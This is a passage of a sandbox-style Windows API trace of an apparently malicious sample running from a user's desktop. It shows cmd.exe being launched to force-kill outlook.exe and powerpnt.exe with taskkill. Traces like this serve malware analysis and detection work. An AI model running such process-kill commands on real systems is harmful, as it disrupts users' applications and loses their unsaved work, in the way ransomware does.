fInfoLevelId=0x0, lpFileInformation=0x12496968 | out: lpFileInformation=0x12496968*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0214.021] CreateFileW (lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0214.022] GetFileAttributesExW (in: lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0x124969b8 | out: lpFileInformation=0x124969b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0214.022] CreateFileW (lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0214.022] GetFileAttributesExW (in: lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0x12496a08 | out: lpFileInformation=0x12496a08*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0214.022] CreateFileW (lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0214.022] GetEnvironmentVariableW (in: lpName="path", lpBuffer=0x1247c9c0, nSize=0x64 | out: lpBuffer="") returned 0x63 [0214.022] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x12496a58 | out: lpFileInformation=0x12496a58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0214.022] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1247ca90, nSize=0x64 | out: lpBuffer="") returned 0x35 [0214.023] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x12496aa8 | out: lpFileInformation=0x12496aa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0214.023] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0214.023] GetConsoleMode (in: hConsoleHandle=0x154, lpMode=0x123a3a7c | out: lpMode=0x123a3a7c) returned 0 [0214.023] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0214.024] GetConsoleMode (in: hConsoleHandle=0x134, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0214.024] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0214.024] GetConsoleMode (in: hConsoleHandle=0x138, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0214.024] GetEnvironmentStringsW () returned 0x8ea900* [0214.026] FreeEnvironmentStringsW (penv=0x8ea900) returned 1 [0214.026] GetCurrentProcess () returned 0xffffffff [0214.026] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x154, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x124a8760, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x124a8760*=0x158) returned 1 [0214.026] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x134, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x124a8764, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x124a8764*=0x130) returned 1 [0214.026] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x138, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x124a8768, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x124a8768*=0x13c) returned 1 [0214.027] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="cmd.exe /c \"taskkill /f /im outlook.exe \"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x400, lpEnvironment=0x124b0a80, lpCurrentDirectory=0x0, lpStartupInfo=0x123a3aa4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x158, hStdOutput=0x130, hStdError=0x13c), lpProcessInformation=0x123a3a80 | out: lpCommandLine="cmd.exe /c \"taskkill /f /im outlook.exe \"", lpProcessInformation=0x123a3a80*(hProcess=0x144, hThread=0x140, dwProcessId=0x254, dwThreadId=0x62c)) returned 1 [0214.148] SetEvent (hEvent=0x150) returned 1 [0214.148] CloseHandle (hObject=0x140) returned 1 [0214.148] CloseHandle (hObject=0x13c) returned 1 [0214.148] CloseHandle (hObject=0x130) returned 1 [0214.148] CloseHandle (hObject=0x158) returned 1 [0214.149] CloseHandle (hObject=0x154) returned 1 [0214.149] CloseHandle (hObject=0x134) returned 1 [0214.149] CloseHandle (hObject=0x138) returned 1 [0214.149] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0xffffffff) returned 0x0 [0216.130] SetEvent (hEvent=0x150) returned 1 [0216.131] GetExitCodeProcess (in: hProcess=0x144, lpExitCode=0x123a3bb4 | out: lpExitCode=0x123a3bb4*=0x0) returned 1 [0216.131] GetProcessTimes (in: hProcess=0x144, lpCreationTime=0x1249ed60, lpExitTime=0x1249ed68, lpKernelTime=0x1249ed70, lpUserTime=0x1249ed78 | out: lpCreationTime=0x1249ed60, lpExitTime=0x1249ed68, lpKernelTime=0x1249ed70, lpUserTime=0x1249ed78) returned 1 [0216.131] CloseHandle (hObject=0x144) returned 1 [0216.132] SetEvent (hEvent=0x128) returned 1 [0216.132] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x4) returned 0x102 [0216.137] SetEvent (hEvent=0x150) returned 1 [0216.137] SetEvent (hEvent=0x128) returned 1 [0216.138] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1248a820, nSize=0x64 | out: lpBuffer="") returned 0x35 [0216.138] GetFileAttributesExW (in: lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x124a2648 | out: lpFileInformation=0x124a2648*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0216.139] CreateFileW (lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0216.139] GetFileAttributesExW (in: lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), fInfoLevelId=0x0, lpFileInformation=0x124a2698 | out: lpFileInformation=0x124a2698*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0216.139] CreateFileW (lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0216.139] GetFileAttributesExW (in: lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0x124a26e8 | out: lpFileInformation=0x124a26e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0216.139] CreateFileW (lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0216.140] GetFileAttributesExW (in: lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0x124a2738 | out: lpFileInformation=0x124a2738*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0216.140] CreateFileW (lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0216.140] GetFileAttributesExW (in: lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0x124a2788 | out: lpFileInformation=0x124a2788*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0216.140] CreateFileW (lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0216.140] GetFileAttributesExW (in: lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0x124a27d8 | out: lpFileInformation=0x124a27d8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0216.140] CreateFileW (lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0216.140] GetFileAttributesExW (in: lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0x124a2828 | out: lpFileInformation=0x124a2828*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0216.140] CreateFileW (lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0216.140] GetFileAttributesExW (in: lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), fInfoLevelId=0x0, lpFileInformation=0x124a2878 | out: lpFileInformation=0x124a2878*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0216.141] CreateFileW (lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0216.141] GetFileAttributesExW (in: lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0x124a28c8 | out: lpFileInformation=0x124a28c8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0216.141] CreateFileW (lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0216.141] GetFileAttributesExW (in: lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0x124a2918 | out: lpFileInformation=0x124a2918*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0216.141] CreateFileW (lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0216.141] GetFileAttributesExW (in: lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0x124a2968 | out: lpFileInformation=0x124a2968*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0216.141] CreateFileW (lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0216.141] GetFileAttributesExW (in: lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0x124a29b8 | out: lpFileInformation=0x124a29b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0216.142] CreateFileW (lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0216.142] GetEnvironmentVariableW (in: lpName="path", lpBuffer=0x1248a8f0, nSize=0x64 | out: lpBuffer="") returned 0x63 [0216.142] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x124a2a08 | out: lpFileInformation=0x124a2a08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0216.142] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1248a9c0, nSize=0x64 | out: lpBuffer="") returned 0x35 [0216.143] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x124a2a58 | out: lpFileInformation=0x124a2a58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0216.143] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x144 [0216.143] GetConsoleMode (in: hConsoleHandle=0x144, lpMode=0x123a3a7c | out: lpMode=0x123a3a7c) returned 0 [0216.159] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0216.159] GetConsoleMode (in: hConsoleHandle=0x138, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0216.159] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0216.159] GetConsoleMode (in: hConsoleHandle=0x134, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0216.159] GetEnvironmentStringsW () returned 0x8ea900* [0216.160] FreeEnvironmentStringsW (penv=0x8ea900) returned 1 [0216.160] GetCurrentProcess () returned 0xffffffff [0216.160] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x144, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x124b8670, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x124b8670*=0x154) returned 1 [0216.160] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x138, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x124b8674, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x124b8674*=0x158) returned 1 [0216.160] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x134, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x124b8678, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x124b8678*=0x130) returned 1 [0216.161] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="cmd.exe /c \"taskkill /f /im powerpnt.exe \"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x400, lpEnvironment=0x124c0a80, lpCurrentDirectory=0x0, lpStartupInfo=0x123a3aa4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x154, hStdOutput=0x158, hStdError=0x130), lpProcessInformation=0x123a3a80 | out: lpCommandLine="cmd.exe /c \"taskkill /f /im powerpnt.exe \"", lpProcessInformation=0x123a3a80*(hProcess=0x140, hThread=0x13c, dwProcessId=0x2f0, dwThreadId=0x12bc)) returned 1 [0216.207] SetEvent (hEvent=0x150) returned 1 [0216.207] CloseHandle (hObject=0x13c) returned 1 [0216.207] CloseHandle (hObject=0x130) returned 1 [0216.207] CloseHandle (hObject=0x158) returned 1 [0216.207] CloseHandle (hObject=0x154) returned 1 [0216.207] CloseHandle (hObject=0x144) returned 1 [0216.208] CloseHandle (hObject=0x138) returned 1 [0216.208] CloseHandle (hObject=0x134) returned 1 [0216.208] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0xffffffff) returned 0x0 [0217.864] SetEvent (hEvent=0x150) returned 1 [0217.864] GetExitCodeProcess (in: hProcess=0x140, lpExitCode=0x123a3bb4 | out: lpExitCode=0x123a3bb4*=0x80) returned 1 [0217.864] GetProcessTimes (in: hProcess=0x140, lpCreationTime=0x124a6d40, lpExitTime=0x124a6d48, lpKernelTime=0x124a6d50, lpUserTime=0x124a6d58 | out: lpCreationTime=0x124a6d40, lpExitTime=0x124a6d48, lpKernelTime=0x124a6d50, lpUserTime=0x124a6d58) returned 1 [0217.865] CloseHandle (hObject=0x140) returned 1 [0217.865] SetEvent (hEvent=0x128) returned 1 [0217.865] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x5) returned 0x102 [0217.888] SetEvent (hEvent=0x150) returned 1 [0217.889] SetEvent (hEvent=0x128) returned 1 [0217.889] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1247cb60, nSize=0x64 | out: lpBuffer="") returned 0x35 [0217.889] GetFileAttributesExW (in: lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x12496af8 | out: lpFileInformation=0x12496af8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0217.890] CreateFileW (lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0217.890] GetFileAttributesExW (in: lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), fInfoLevelId=0x0, lpFileInformation=0x12496b48 | out: lpFileInformation=0x12496b48*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0217.890] CreateFileW (lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0217.890] GetFileAttributesExW (in: lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0x12496b98 | out: lpFileInformation=0x12496b98*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0217.890] CreateFileW (lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0217.890] GetFileAttributesExW (in: lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0x12496be8 | out: lpFileInformation=0x12496be8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0217.890] CreateFileW (lpFileName="cmd.exe.bat" (normalized: 